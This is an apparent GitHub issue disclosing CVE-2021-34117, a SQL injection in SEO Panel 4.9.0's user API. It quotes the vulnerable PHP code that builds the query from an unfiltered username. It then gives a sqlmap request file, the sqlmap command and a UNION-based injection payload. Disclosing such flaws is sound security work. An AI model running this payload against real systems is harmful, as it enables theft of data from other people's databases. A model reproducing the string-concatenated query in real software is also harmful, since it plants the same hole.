CVE-2021-34117: SQL Injection Vulnerability in API function (user.api.php) · Issue #219 · seopanel/Seo-Panel
SQL Injection vulnerability in SEO Panel 4.9.0 in api/user.api.php in function getUserName in the username parameter, allows attackers to gain sensitive information.
Hi there,
I want to report a SQL Injection Vulnerability in the the current API implementation of Seo-Panel.
In api/user.api.php, the function getUserName directly calls function __checkUserName in controllers/user.ctrl.php file without filtering on variables. Attacker can pass arbitrary string to username variable through $info. This allows injection to the __checkUsername function directly:
function getUserName($info) {
$username = $info['username'];
$returnInfo = array();
// validate the user ifd and user info
if (!empty($username)) {
if ($userInfo = $this->ctrler->__checkUserName($username)) {
$returnInfo['response'] = 'success';
$returnInfo['result'] = $userInfo;
return $returnInfo;
$returnInfo['response'] = 'Error';
$returnInfo['error_msg'] = "Invalid username provided";
return $returnInfo;
function __checkUserName($username){
$sql = "select id from users where username='$username'";
$userInfo = $this->db->select($sql, true);
return empty($userInfo['id']) ? false : $userInfo['id'];
The above-mentioned vulnerability can be reproduced by sqlmap through a request file injection.txt:
POST /seopanel/api/api.php HTTP/1.1
Host: localhost
Accept: */*
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
Connection: close
with sqlmap command: sqlmap -r injection.txt -p ‘username’. A boolean-based blind injection shall work, with payload similar to:
username=123’ UNION ALL SELECT CONCAT(CONCAT(‘abc’,’abc’),’abc’)-- (do note that there’s one space at the end of variable to bypass the original quotation mark).